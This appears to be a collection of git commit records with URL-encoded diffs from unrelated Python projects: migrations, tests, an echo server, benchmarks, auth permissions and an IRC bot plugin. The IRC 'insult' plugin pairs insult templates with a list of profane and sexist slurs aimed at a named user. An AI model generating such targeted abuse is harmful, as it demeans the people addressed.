subprocess.call(command) assert return_code == 0 # Both the .cpp and .h were generated in cppdir, but if hdir is different, # the .h needs to move. Copy it instead of using os.rename for maximum # portability in all cases. if cppdir != hdir: input_basename = os.path.basename(input) (root, ext) = os.path.splitext(input_basename) hname = 'V8%s.h' % root hsrc = os.path.join(cppdir, hname) hdst = os.path.join(hdir, hname) shutil.copyfile(hsrc, hdst) os.unlink(hsrc) return return_code if __name__ == '__main__': sys.exit(main(sys.argv))
Python
0.999999
@@ -1495,16 +1495,26 @@ ns) == 3 +, sections %0A (base @@ -1571,62 +1571,45 @@ == 3 +, base %0A +( input - = base%5B0%5D%0A cppdir = base%5B1%5D%0A +, cppdir, hdir +) = base -%5B2%5D %0A%0A @@ -1630,16 +1630,24 @@ uts) %3E 1 +, inputs %0A gener
c48d852c2ceb39e6692be1b2c270aa75156e5b5e
Add migrations/0121_….py
ielex/lexicon/migrations/0121_copy_hindi_transliteration_to_urdu.py
ielex/lexicon/migrations/0121_copy_hindi_transliteration_to_urdu.py
Python
0
@@ -0,0 +1,1283 @@ +# -*- coding: utf-8 -*-%0A# Inspired by:%0A# https://github.com/lingdb/CoBL/issues/223#issuecomment-256815113%0Afrom __future__ import unicode_literals, print_function%0Afrom django.db import migrations%0A%0A%0Adef forwards_func(apps, schema_editor):%0A Language = apps.get_model(%22lexicon%22, %22Language%22)%0A Meaning = apps.get_model(%22lexicon%22, %22Meaning%22)%0A Lexeme = apps.get_model(%22lexicon%22, %22Lexeme%22)%0A%0A hindi = Language.objects.get(ascii_name='Hindi')%0A urdu = Language.objects.get(ascii_name='Urdu')%0A%0A for meaning in Meaning.objects.all():%0A hLexemes = Lexeme.objects.filter(language=hindi, meaning=meaning).all()%0A uLexemes = Lexeme.objects.filter(language=urdu, meaning=meaning).all()%0A%0A if len(hLexemes) != 1 or len(uLexemes) != 1:%0A continue%0A%0A hLex = hLexemes%5B0%5D%0A uLex = uLexemes%5B0%5D%0A%0A if uLex.transliteration == '' and hLex.transliteration != '':%0A uLex.transliteration = hLex.transliteration%0A uLex.save()%0A%0A%0Adef reverse_func(apps, schema_editor):%0A print('Reverse of 0121_copy_hindi_transliteration_to_urdu does nothing.')%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B('lexicon', '306_0127_fix_issue_223')%5D%0A%0A operations = %5B%0A migrations.RunPython(forwards_func, reverse_func),%0A %5D%0A
da5bd8b1afcffd8a0509a785183ce1474fe7f53c
Create insult.py
insult.py
insult.py
Python
0.001151
@@ -0,0 +1,1973 @@ +%22%22%22By Bowserinator: Insults people :D%22%22%22%0A%0Afrom utils import add_cmd, add_handler%0Aimport utils%0Aimport random%0A%0Aname = %22insult%22%0Acmds = %5B%22insult%22%5D%0A%0AinsultPattern = %5B%0A %22That %5BREPLACE%5D just cut me off!%22,%0A %22My boss is a major %5BREPLACE%5D!%22,%0A %22Don't tell her I said this, but that dude she's with is a real %5BREPLACE%5D!%22,%0A %22Quit being such a %5BREPLACE%5D!%22,%0A %22The only people who would vote for that guy are total %5BREPLACE%5Ds!%22,%0A %22What are you, some kind of %5BREPLACE%5D?%22,%0A %22Dude's a real %5BREPLACE%5D, you know what I mean?%22,%0A %22He's got an ego like a %5BREPLACE%5D!%22,%0A %22She was being a real %5BREPLACE%5D at the store today!%22,%0A %22That %5BREPLACE%5D developer's code refuses to compile!%22,%0A %22Her kids are total %5BREPLACE%5Ds!%22,%0A %22Whoever wrote this API documentation is a complete %5BREPLACE%5D!%22,%0A %22That guy has the personality of a %5BREPLACE%5D!%22,%0A %22I'm pretty sure I was a total %5BREPLACE%5D at the bar last night.%22,%0A %22What kind of %5BREPLACE%5D buys pre-ground coffee?%22,%0A %22I'd rather get a %5BREPLACE%5D to the eye than sit through this lecture.%22,%0A %22Wow, that %5BREPLACE%5D just went off the deep end.%22,%0A %22I may be a jerk, but at least I'm not like that %5BREPLACE%5D over there.%22,%0A %22I need that like I need a %5BREPLACE%5D on my elbow.%22,%0A %22What kind of %5BREPLACE%5D slows down to merge on the highway?%22,%0A %22You've got a face like a %5BREPLACE%5D.%22,%0A %22Nothing personal, but you're a real %5BREPLACE%5D.%22,%0A %22What a bunch of %5BREPLACE%5Ds.%22,%0A %22That %5BREPLACE%5D is legally dead in 27 states - plus Guam.%22,%0A%5D%0A%0Abadwords = %5B%0A 'Ass',%0A 'Bitch',%0A 'Butt',%0A 'Cock',%0A 'Cum',%0A 'Cunt',%0A 'Dick',%0A 'Douche',%0A 'Fart',%0A 'Fuck',%0A 'Jizz',%0A 'Schlong',%0A 'Shit',%0A 'Slut',%0A 'Snatch',%0A 'Tit',%0A 'Twat',%0A 'Wang',%0A 'Wank',%0A 'Whore',%0A%5D%0A%0A@add_cmd%0Adef extract(irc, event, args):%0A send = %22%5Cx02%22 + args%5B0%5D +%22, %5Cx0f%22 + random.choice(insultPattern).replace(%22%5BREPLACE%5D%22,random.choice(badwords).lower())%0A irc.reply(event, send)%0A %0Aadd_handler(insult, name)%0A
1a1bf760f9d912f6c19943b58198d947b4e65b84
Add mraa GPIO test
meta-iotqa/lib/oeqa/runtime/sanity/mraa_gpio.py
meta-iotqa/lib/oeqa/runtime/sanity/mraa_gpio.py
Python
0.000001
@@ -0,0 +1,1440 @@ +from oeqa.oetest import oeRuntimeTest%0Aimport unittest%0Aimport subprocess%0Afrom time import sleep%0A%0Aclass MraaGpioTest(oeRuntimeTest):%0A '''%0A These tests require to use BeagleBone as testing host%0A '''%0A pin = %22%22%0A def setUp(self):%0A (status, output)= self.target.run(%22mraa-gpio version%22)%0A output = output.lower()%0A if any(x in output for x in (%22broxton%22, %22tuchuck%22, %22joule%22)):%0A self.pin = %2251%22%0A elif %22minnowboard%22 in output:%0A self.pin = %2225%22%0A else:%0A raise unittest.SkipTest(output)%0A%0A def test_gpio(self):%0A '''%0A Test a GPIO pin on and off and check the pin output with%0A BeagleBone%0A '''%0A def check_gpio_output():%0A cmd = %22cat /sys/class/gpio/gpio20/value%22.split()%0A output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)%0A return int(output)%0A%0A self.target.run(%22mraa-gpio set %22 + self.pin + %22 0%22)%0A sleep(1)%0A output = check_gpio_output()%0A self.assertEqual(output, 0, msg=%22GPIO pin output is not 0%22)%0A%0A self.target.run(%22mraa-gpio set %22 + self.pin + %22 1%22)%0A sleep(1)%0A output = check_gpio_output()%0A self.assertEqual(output, 1, msg=%22GPIO pin output is not 1%22)%0A%0A self.target.run(%22mraa-gpio set %22 + self.pin + %22 0%22)%0A sleep(1)%0A output = check_gpio_output()%0A self.assertEqual(output, 0, msg=%22GPIO pin output is not 0%22)%0A
8b7e84e98ccf0b44d7c6cc6ff23f462ec648d3f0
add test
msmbuilder/tests/test_feature_selection.py
msmbuilder/tests/test_feature_selection.py
import numpy as np from sklearn.feature_selection import VarianceThreshold as VarianceThresholdR from ..featurizer import DihedralFeaturizer from ..feature_selection import FeatureSelector, VarianceThreshold from ..example_datasets import fetch_alanine_dipeptide as fetch_data FEATS = [ ('phi', DihedralFeaturizer(types=['phi'], sincos=True)), ('psi', DihedralFeaturizer(types=['psi'], sincos=True)), ] def test_featureselector(): dataset = fetch_data() trajectories = dataset["trajectories"] fs = FeatureSelector(FEATS, which_feat='phi') assert fs.which_feat == ['phi'] y1 = fs.partial_transform(trajectories[0]) y_ref1 = FEATS[0][1].partial_transform(trajectories[0]) np.testing.assert_array_almost_equal(y_ref1, y1) def test_variancethreshold_vs_sklearn(): dataset = fetch_data() trajectories = dataset["trajectories"] fs = FeatureSelector(FEATS) vt = VarianceThreshold(0.1) vtr = VarianceThresholdR(0.1) y = fs.partial_transform(trajectories[0]) z1 = vt.fit_transform([y])[0] z_ref1 = vtr.fit_transform(y) np.testing.assert_array_almost_equal(z_ref1, z1)
Python
0.000002
@@ -771,16 +771,255 @@ , y1)%0A%0A%0A +def test_featureselector_transform():%0A dataset = fetch_data()%0A trajectories = dataset%5B%22trajectories%22%5D%0A%0A fs = FeatureSelector(FEATS, which_feat='psi')%0A%0A y1 = fs.transform(trajectories)%0A%0A assert len(y1) == len(trajectories)%0A%0A%0A def test
e2b74a9978de4a6f15273e3e098379107eb0bec3
Create 0001_0.py
pylyria/0001/0001_0.py
pylyria/0001/0001_0.py
Python
0.019732
@@ -0,0 +1,632 @@ +# -*- coding: utf-8 -*-%0A#!/usr/bin/env python%0A#%E7%AC%AC 0001 %E9%A2%98%EF%BC%9A%E5%81%9A%E4%B8%BA Apple Store App %E7%8B%AC%E7%AB%8B%E5%BC%80%E5%8F%91%E8%80%85%EF%BC%8C%E4%BD%A0%E8%A6%81%E6%90%9E%E9%99%90%E6%97%B6%E4%BF%83%E9%94%80%EF%BC%8C%E4%B8%BA%E4%BD%A0%E7%9A%84%E5%BA%94%E7%94%A8%E7%94%9F%E6%88%90%E6%BF%80%E6%B4%BB%E7%A0%81%EF%BC%88%E6%88%96%E8%80%85%E4%BC%98%E6%83%A0%E5%88%B8%EF%BC%89%EF%BC%8C%E4%BD%BF%E7%94%A8 Python %E5%A6%82%E4%BD%95%E7%94%9F%E6%88%90 200 %E4%B8%AA%E6%BF%80%E6%B4%BB%E7%A0%81%EF%BC%88%E6%88%96%E8%80%85%E4%BC%98%E6%83%A0%E5%88%B8%EF%BC%89%EF%BC%9F%0Aimport random%0Aimport string%0A%0Adef activation_code(id,length=16):%0A prefix = hex(int(id))%5B2:%5D+'V'%0A length = length - len(prefix)%0A chars=string.ascii_uppercase+string.digits%0A return prefix + ''.join(%5Brandom.choice(chars) for i in range(length)%5D)%0A%0Adef get_id(code):%0A return str(int(code.upper(), 16))%0A%0Aif __name__ == '__main__':%0A for i in range(10, 500, 23):%0A code = activation_code(i)%0A id_hex = code.split('L')%5B0%5D%0A id = get_id(id_hex)%0A print code,id%0A
45db21e2b4093cbda7976189327467ca3aebe1a3
add instance serializer
api/v2/serializers/instance_serializer.py
api/v2/serializers/instance_serializer.py
Python
0.000001
@@ -0,0 +1,508 @@ +from core.models import Instance%0Afrom rest_framework import serializers%0Afrom .identity_summary_serializer import IdentitySummarySerializer%0Afrom .user_serializer import UserSerializer%0A%0A%0Aclass InstanceSerializer(serializers.ModelSerializer):%0A identity = IdentitySummarySerializer(source='created_by_identity')%0A user = UserSerializer(source='created_by')%0A%0A class Meta:%0A model = Instance%0A fields = ('id', 'name', 'ip_address', 'shell', 'vnc', 'start_date', 'end_date', 'identity', 'user')%0A
3fc5c2a4d3f13dc8062c93dd86fd94f06c35c91d
add an easy echo server by using python
network/echo-server/echo-iterative/main.py
network/echo-server/echo-iterative/main.py
Python
0.000002
@@ -0,0 +1,2089 @@ +#!/usr/bin/env python%0A# -*- coding: UTF-8 -*-%0A#%0A# Copyright (c) 2016 ASMlover. All rights reserved.%0A#%0A# Redistribution and use in source and binary forms, with or without%0A# modification, are permitted provided that the following conditions%0A# are met:%0A#%0A# * Redistributions of source code must retain the above copyright%0A# notice, this list ofconditions and the following disclaimer.%0A#%0A# * Redistributions in binary form must reproduce the above copyright%0A# notice, this list of conditions and the following disclaimer in%0A# the documentation and/or other materialsprovided with the%0A# distribution.%0A#%0A# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS%0A# %22AS IS%22 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT%0A# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS%0A# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE%0A# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,%0A# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,%0A# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;%0A# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER%0A# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT%0A# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN%0A# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE%0A# POSSIBILITY OF SUCH DAMAGE.%0Aimport socket%0A%0Adef handle(client_socket, client_address):%0A while True:%0A data = client_socket.recv(4096)%0A if data:%0A sent = client_socket.send(data)%0A else:%0A print 'disconnect', client_address%0A client_socket.close()%0A break%0A%0Adef main():%0A listen_address = ('0.0.0.0', 5555)%0A server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)%0A server_socket.bind(listen_address)%0A server_socket.listen(5)%0A%0A while True:%0A (client_socket, client_address) = server_socket.accept()%0A print 'got connection from', client_address%0A handle(client_socket, client_address)%0A%0Aif __name__ == '__main__':%0A main()%0A
07fd61306e645b7240883d5d468f94be5ce8a34c
Add a command to retrieve all triggers
Commands/Triggers.py
Commands/Triggers.py
Python
0.000002
@@ -0,0 +1,881 @@ +from IRCResponse import IRCResponse, ResponseType%0Afrom CommandInterface import CommandInterface%0Aimport GlobalVars%0A%0Aclass Command(CommandInterface):%0A triggers = %5B%22triggers%22%5D%0A help = %22triggers -- returns a list of all command triggers, must be over PM%22%0A%0A def execute(self, Hubbot, message):%0A if message.User.Name != message.ReplyTo:%0A return IRCResponse(ResponseType.Say, %22%7B%7D must be used over PM!%22.format(message.Command), message.ReplyTo)%0A else:%0A response = %22%22%0A for name, command in GlobalVars.commands.iteritems():%0A if len(command.triggers)%3E0:%0A for trigger in command.triggers:%0A if %22%3C%22 not in trigger and trigger not in response:%0A response += %22%7B%7D, %22.format(trigger)%0A return IRCResponse(ResponseType.Say, response, message.ReplyTo)
b173aa1a6dc1c361d65150c6782db7618a5ff126
Add simple indexing test.
benchmarks/simpleindex.py
benchmarks/simpleindex.py
Python
0
@@ -0,0 +1,1393 @@ +import timeit%0A# This is to show that NumPy is a poorer choice than nested Python lists%0A# if you are writing nested for loops.%0A# This is slower than Numeric was but Numeric was slower than Python lists were%0A# in the first place. %0A%0AN = 30%0Acode2 = r%22%22%22%0Afor k in xrange(%25d):%0A for l in xrange(%25d):%0A res = a%5Bk,l%5D.item() + a%5Bl,k%5D.item()%0A%22%22%22 %25 (N,N)%0Acode3 = r%22%22%22%0Afor k in xrange(%25d):%0A for l in xrange(%25d):%0A res = a%5Bk%5D%5Bl%5D + a%5Bl%5D%5Bk%5D%0A%22%22%22 %25 (N,N)%0Acode = r%22%22%22%0Afor k in xrange(%25d):%0A for l in xrange(%25d):%0A res = a%5Bk,l%5D + a%5Bl,k%5D%0A%22%22%22 %25 (N,N)%0Asetup3 = r%22%22%22%0Aimport random%0Aa = %5B%5BNone for k in xrange(%25d)%5D for l in xrange(%25d)%5D%0Afor k in xrange(%25d):%0A for l in xrange(%25d):%0A a%5Bk%5D%5Bl%5D = random.random()%0A%22%22%22 %25 (N,N,N,N)%0At1 = timeit.Timer(code, 'import numpy as N; a = N.rand(%25d,%25d)' %25 (N,N))%0At2 = timeit.Timer(code, 'import MLab as N; a=N.rand(%25d,%25d)' %25 (N,N))%0At3 = timeit.Timer(code, 'import numarray.mlab as N; a=N.rand(%25d,%25d)' %25 (N,N))%0At4 = timeit.Timer(code2, 'import numpy as N; a = N.rand(%25d,%25d)' %25 (N,N))%0At5 = timeit.Timer(code3, setup3)%0At6 = timeit.Timer(%22res = a + a.transpose()%22,%22import numpy as N; a=N.rand(%25d,%25d)%22 %25 (N,N))%0Aprint %22shape = %22, (N,N)%0Aprint %22NumPy 1: %22, t1.repeat(3,100)%0Aprint %22NumPy 2: %22, t4.repeat(3,100)%0Aprint %22Numeric: %22, t2.repeat(3,100)%0Aprint %22Numarray: %22, t3.repeat(3,100)%0Aprint %22Python: %22, t5.repeat(3,100)%0Aprint %22Optimized: %22, t6.repeat(3,100)%0A
99061bec96a7337e6ddc1d698f00805f84089b3b
Set content headers on download
bepasty/views/download.py
bepasty/views/download.py
# Copyright: 2013 Bastian Blank <[email protected]> # License: BSD 2-clause, see LICENSE for details. from flask import Response, current_app, stream_with_context from flask.views import MethodView from ..utils.name import ItemName from . import blueprint class DownloadView(MethodView): def get(self, name): n = ItemName.parse(name) item = current_app.storage.open(n) def stream(): try: # Stream content from storage offset = 0 size = item.data.size while offset < size: buf = item.data.read(16*1024, offset) offset += len(buf) yield buf finally: item.close() return Response(stream_with_context(stream())) blueprint.add_url_rule('/<name>/+download', view_func=DownloadView.as_view('download'))
Python
0
@@ -771,11 +771,10 @@ ret -urn + = Res @@ -810,16 +810,196 @@ eam()))%0A + ret.headers%5B'Content-Disposition'%5D = 'attachment; filename=%22%7B%7D%22'.format(item.meta%5B'filename'%5D)%0A ret.headers%5B'Content-Length'%5D = item.meta%5B'size'%5D%0A return ret%0A %0A%0Abluepr
5787d3ff813d2c96d0ec2c2fd90f91b93315e564
Add stub for cliches
proselint/checks/inprogress/wgd_cliches.py
proselint/checks/inprogress/wgd_cliches.py
Python
0.000001
@@ -0,0 +1,351 @@ +%22%22%22WGD101: Cliches.%0A%0A---%0Alayout: post%0Aerror_code: WGD101%0Asource: write-good%0Asource_url: https://github.com/btford/write-good%0Atitle: WGD101&#58; Cliches%0Adate: 2014-06-10 12:31:19%0Acategories: writing%0A---%0A%0ACliches are cliche.%0A%0A%22%22%22%0A%0A%0Adef check(text):%0A%0A error_code = %22WGD101%22%0A msg = %22Cliche.%22%0A%0A return %5B(1, 1, error_code, msg)%5D%0A
9068fd506811113c50886bf9c8f4094b7e1bd7a3
Add stats.py from week 2.
hw3/stats.py
hw3/stats.py
Python
0
@@ -0,0 +1,1956 @@ +#!/usr/bin/python%0A%0A# Week 2 Problem 3. Simple statistics.%0A%0A# Use Python 3 print() function, Python 3 integer division%0Afrom __future__ import print_function, division%0A%0A%0Adef get_stats(input_list):%0A '''%0A Accepts a list of integers, and returns a tuple of four numbers:%0A minimum(int), maximum(int), mean(float), and median(float)%0A%0A %3E%3E%3E get_stats(%5B0, 1, 2, 3, 4%5D)%0A (0, 4, 2.0, 2.0)%0A %3E%3E%3E get_stats(%5B0, 1, 2, 3, 4, 5%5D)%0A (0, 5, 2.5, 2.5)%0A %3E%3E%3E get_stats(%5B0, 1, 2, 5%5D)%0A (0, 5, 2.0, 1.5)%0A %3E%3E%3E get_stats(%5B0, 1, 2, 4, 5%5D)%0A (0, 5, 2.4, 2.0)%0A ''' %0A%0A # min() and max() are in the standard library%0A # you could also write%0A # minimum = sorted(input_list)%5B0%5D%0A # maximum = sorted(input_list)%5B-1%5D%0A minimum = min(input_list)%0A maximum = max(input_list)%0A%0A # use the sum() function from the standard library to calculate mean%0A # this is equivalent to%0A # total = length = 0%0A # for i in input_list: total += i%0A # for i in input_list: length += 1%0A # mean = total / length%0A mean = sum(input_list) / len(input_list)%0A%0A # calculate the median%0A # if the number of elements is even, we take the average of 2 middle numbers%0A # if the number of elements is odd, median is the middle element%0A # note that we used the Python 3 integer division // to get integer%0A if len(input_list) %25 2:%0A median = input_list%5B(len(input_list) - 1) // 2 %5D%0A else:%0A median = 0.5 * (input_list%5B(len(input_list) - 1) // 2%5D %5C%0A + input_list%5Blen(input_list) // 2%5D)%0A%0A # return a tuple of min, max, mean, median%0A return minimum, maximum, mean, median%0A %0Aif __name__ == '__main__':%0A%0A # we will test our function with a list of integers from 0 to 50%0A my_list = range(0, 51)%0A%0A # get_stats returns a tuple of min, max, mean, median of my_list%0A # print out min, max, mean, median on each line%0A print(%22Minimum: %25i%5CnMaximum: %25i%5CnMean: %25.1f%5CnMedian: %25.1f%22 %25 get_stats(my_list))
84f31dfa718a2f557b0058920037265331fd1a3f
Add missing merge migration
osf/migrations/0099_merge_20180427_1109.py
osf/migrations/0099_merge_20180427_1109.py
Python
0.000002
@@ -0,0 +1,332 @@ +# -*- coding: utf-8 -*-%0A# Generated by Django 1.11.11 on 2018-04-27 16:09%0Afrom __future__ import unicode_literals%0A%0Afrom django.db import migrations%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('osf', '0098_merge_20180416_1807'),%0A ('osf', '0098_auto_20180418_1722'),%0A %5D%0A%0A operations = %5B%0A %5D%0A
d6850ebe441a966dcf17f5cb8b0ce57a7c9dce8a
Add argument parsing
helenae/db/create_db.py
helenae/db/create_db.py
Python
0.000035
@@ -0,0 +1,2279 @@ +from optparse import OptionParser%0A%0Aimport sqlalchemy.exc%0Afrom sqlalchemy import text%0Afrom sqlalchemy.orm import sessionmaker%0A%0Afrom tables import *%0A%0A%0Adef create_db():%0A %22%22%22%0A Defined tables at tables.py file are created in some DB%0A %22%22%22%0A try:%0A Base.metadata.create_all(engine)%0A except sqlalchemy.exc.InvalidRequestError:%0A print %22SQLAlchemy ERROR: SQLAlchemy was asked to do something it can't do%22%0A except sqlalchemy.exc.DBAPIError, exc:%0A print %22SQLAlchemy ERROR: %25s%22, (exc)%0A except sqlalchemy.exc.SQLAlchemyError, exc:%0A print %22SQLAlchemy ERROR: %25s%22, (exc)%0A%0Adef initialize_db():%0A %22%22%22%0A This code inserting testing data into defined tables%0A %22%22%22%0A #insert test data%0A Session = sessionmaker(bind=engine)%0A session = Session()%0A%0A test_dir = Catalog('test')%0A session.add(test_dir)%0A session.commit()%0A%0A #test_file = File('test.txt', '123456.txt', hash('123456.txt'), 1024, 0, 1)%0A #test_file.server_id.append(test_server)%0A #session.add(test_file)%0A #session.commit()%0A%0A test_fs = FileSpace('test')%0A session.add(test_fs)%0A session.commit()%0A%0A test_acctype = AccountType('free', 0.00)%0A session.add(test_acctype)%0A session.commit()%0A%0A test_group = Group('users', 1101)%0A session.add(test_group)%0A session.commit()%0A%0A test_user = Users('relrin', 'Valery Savich', hash('123456'), '[email protected]', '01.01.2014', 1, 1, 1)%0A session.add(test_user)%0A session.commit()%0A%0A session.close()%0A print %22Insertion data has complete!%22%0A%0A print %22Test query: Getting data from %5BUsers%5D table%5Cn%22%0A connection = engine.connect()%0A result = engine.execute(text(%22select name, fullname, password from users%22))%0A for row in result:%0A print %22Users%3Cname=%25s, fullname=%25s, password=%25s%3E%22 %25 (row.name, row.fullname, row.password)%0A%0A%0A%0Aif __name__ == '__main__':%0A parser = OptionParser()%0A parser.add_option(%22-c%22, %22--crtdb%22, dest='cdb', help = %22Create database%22, default=False)%0A parser.add_option(%22-i%22, %22--initdb%22, dest = %22idb%22, help = %22Initialize DB: insert test data%22, default=False)%0A (options, args) = parser.parse_args()%0A%0A options.cdb = bool(options.cdb)%0A options.idb = bool(options.idb)%0A if options.cdb:%0A create_db()%0A if options.idb:%0A initialize_db()%0A
712733ead5e36362fe6e2eca1235744c257c7f69
Create helloWorld.py
helloWorld.py
helloWorld.py
Python
0.999992
@@ -0,0 +1,45 @@ +# programe in python%0A%0Aprintf(%22Hello World!%22)%0A
bf56a5afed926d7cdd536c1da8ba5b021a09bd95
Test pipe framework
skan/test/test_pipe.py
skan/test/test_pipe.py
Python
0
@@ -0,0 +1,474 @@ +import os%0Aimport pytest%0A%0Aimport pandas%0Afrom skan import pipe%0A%[email protected]%0Adef image_filename():%0A rundir = os.path.abspath(os.path.dirname(__file__))%0A datadir = os.path.join(rundir, 'data')%0A return os.path.join(datadir, 'retic.tif')%0A%0A%0Adef test_pipe(image_filename):%0A data = pipe.process_images(%5Bimage_filename%5D, 'fei', 5e-8, 0.1, 0.075,%0A 'Scan/PixelHeight')%0A assert type(data) == pandas.DataFrame%0A assert data.shape%5B0%5D %3E 0%0A
b663bf77fe60a108598db4ae8310e8877d06cddd
Add unit tests for core module
tests/core_test.py
tests/core_test.py
Python
0
@@ -0,0 +1,2022 @@ +%22%22%22Test CLI module%22%22%22%0A%0A%0Aimport os%0Aimport sys%0Aimport tempfile%0Aimport unittest%0Afrom mock import mock_open, patch%0Afrom context import dfman%0Afrom dfman import config, const, core%0A%0A%0Aclass TestMainRuntime(unittest.TestCase):%0A%0A @patch('dfman.core.Config')%0A @patch.object(dfman.core.MainRuntime, 'set_output_streams')%0A def test_run_initial_setup(self, _, mock_config):%0A mc_return = mock_config.return_value%0A # dry run and verbose are set to false with args%0A mc_return.getboolean.return_value = False%0A runtime = dfman.core.MainRuntime(False, False)%0A runtime.run_initial_setup()%0A%0A self.assertFalse(runtime.dry_run)%0A self.assertFalse(runtime.verbose)%0A%0A # verbose is set to true with config file but not with args%0A mc_return.getboolean.return_value = True%0A runtime.run_initial_setup()%0A%0A self.assertTrue(runtime.verbose)%0A%0A def test_get_distro(self):%0A test_os = %5C%0Ab'''%0ANAME=%22Scary Linux%22%0AID=spooky%0APRETTY_NAME=%22Spooky Scary Linux%22%0AANSI_COLOR=%221;32%22%0A'''%0A with tempfile.NamedTemporaryFile() as tmp:%0A tmp.write(test_os)%0A tmp.seek(0)%0A%0A runtime = dfman.core.MainRuntime(False, False)%0A const.SYSTEMD_DISTINFO = tmp.name%0A self.assertEqual(runtime.get_distro(), 'spooky')%0A%0A def test_get_overrides(self):%0A test_config = %5C%0Ab'''%0A%5BOverrides%5D%0Afile1 = dir1/file1%0Afile2 = dir2/file2%0A%0A%5Bspooky%5D%0Afile2 = distoverride/file2%0A'''%0A with tempfile.NamedTemporaryFile() as tmp:%0A tmp.write(test_config)%0A tmp.seek(0)%0A config = dfman.Config()%0A config.cfg_file = tmp.name%0A config.load_cfg()%0A%0A runtime = dfman.core.MainRuntime(False, False)%0A runtime.config = config%0A runtime.distro = 'spooky'%0A overrides = runtime.get_overrides()%0A%0A self.assertEqual(overrides%5B'file1'%5D, 'dir1/file1')%0A self.assertEqual(overrides%5B'file2'%5D, 'distoverride/file2')%0A%0A%0A%0A%0Aif __name__ == '__main__':%0A unittest.main()%0A
be59230531d98dc25f806b2290a51a0f4fde1d3b
Rename model to prevent crash during module upgrade in tests
addons/survey/migrations/8.0.2.0/pre-migration.py
addons/survey/migrations/8.0.2.0/pre-migration.py
Python
0
@@ -0,0 +1,236 @@ +# coding: utf-8%0Afrom openupgradelib import openupgrade%0A%0A%[email protected]()%0Adef migrate(cr, version):%0A openupgrade.rename_tables(cr, %5B('survey', 'survey_survey')%5D)%0A openupgrade.rename_models(cr, %5B('survey', 'survey.survey')%5D)%0A
a277a25014c250c04fabb669013305940c867abc
Introduce new variables
openfisca_country_template/variables/stats.py
openfisca_country_template/variables/stats.py
Python
0.000007
@@ -0,0 +1,1654 @@ +# -*- coding: utf-8 -*-%0A%0A# This file defines the variables of our legislation.%0A# A variable is property of a person, or an entity (e.g. a household).%0A# See http://openfisca.org/doc/variables.html%0A%0A# Import from openfisca-core the common python objects used to code the legislation in OpenFisca%0Afrom openfisca_core.model_api import *%0A# Import the entities specifically defined for this tax and benefit system%0Afrom openfisca_country_template.entities import *%0A%0A%0Aclass total_benefits(Variable):%0A column = FloatCol%0A entity = Household%0A definition_period = MONTH%0A label = %22Sum of the benefits perceived by a household%22%0A reference = %22https://stats.gov.example/benefits%22%0A%0A def formula(household, period, parameters):%0A basic_income_i = household.members('basic_income', period) # Calculates the value of basic_income for each member of the household%0A%0A return (%0A + household.sum(basic_income_i) # Sum the household members basic incomes%0A + household('housing_allowance', period)%0A )%0A%0A%0Aclass total_taxes(Variable):%0A column = FloatCol%0A entity = Household%0A definition_period = MONTH%0A label = %22Sum of the taxes paid by a household%22%0A reference = %22https://stats.gov.example/taxes%22%0A%0A def formula(household, period, parameters):%0A income_tax_i = household.members('income_tax', period)%0A social_security_contribution_i = household.members('social_security_contribution', period)%0A%0A return (%0A + household.sum(income_tax_i)%0A + household.sum(social_security_contribution_i)%0A + household('housing_tax', period.this_year) / 12%0A )%0A
4af5ec8c040cc1e1eae6b6208bb7e2cfeac7e146
Allow custom Permissions to take Requests or Divisions
evesrp/auth/__init__.py
evesrp/auth/__init__.py
import re from collections import namedtuple from functools import partial from flask.ext.login import current_user from flask.ext.principal import Permission, UserNeed, RoleNeed, identity_loaded from flask.ext.wtf import Form from wtforms.fields import SubmitField, HiddenField from .. import app, db, login_manager, principal class AuthForm(Form): submit = SubmitField('Login') @classmethod def append_field(cls, name, field): setattr(cls, name, field) return cls class AuthMethod(object): name = 'Base Authentication' def form(self): """Return an instance of the form to login.""" return AuthForm.append_field('auth_method', HiddenField(default=self.name)) def login(self, form): """Process a validated login form. You must return a valid response object. """ pass def list_groups(self, user=None): pass @classmethod def register_views(cls, app): """Register views (if needed). This is an optional method to implement. """ pass # Work around some circular imports from .models import User, Group, Division @login_manager.user_loader def login_loader(userid): """Pull a user object from the database. This is used for loading users from existing sessions. """ return User.query.get(int(userid)) # This can be confusing, so here goes. Needs really only need to be tuples, of # some unspecified (but known) length. So, we create named tuples, and then to # make creating them easier freeze the first argument using partial. ReimbursementNeed = namedtuple('ReimbursementNeed', ['method', 'division']) SubmitRequestsNeed = partial(ReimbursementNeed, 'submit') ReviewRequestsNeed = partial(ReimbursementNeed, 'review') PayoutRequestsNeed = partial(ReimbursementNeed, 'pay') # Now, create Permission classes for these kinds of needs. class SubmitRequestsPermission(Permission): def __init__(self, division): need = SubmitRequestsNeed(division.id) super(SubmitRequestsPermission, self).__init__(need) class ReviewRequestsPermission(Permission): def __init__(self, division): need = ReviewRequestsNeed(division.id) super(ReviewRequestsPermission, self).__init__(need) class PayoutRequestsPermission(Permission): def __init__(self, division): need = PayoutRequestsNeed(division.id) super(PayoutRequestsPermission, self).__init__(need) @identity_loaded.connect_via(app) def load_user_permissions(sender, identity): identity.user = current_user if current_user.is_authenticated(): # Set user role (see and modify their own requests)j identity.provides.add(UserNeed(current_user.id)) # Set division roles for role in ('submit', 'review', 'pay'): for division in current_user.divisions[role]: identity.provides.add(ReimbursementNeed(role, division.id)) # If they're an admin, set that if current_user.admin: identity.provides.add(RoleNeed('admin'))
Python
0
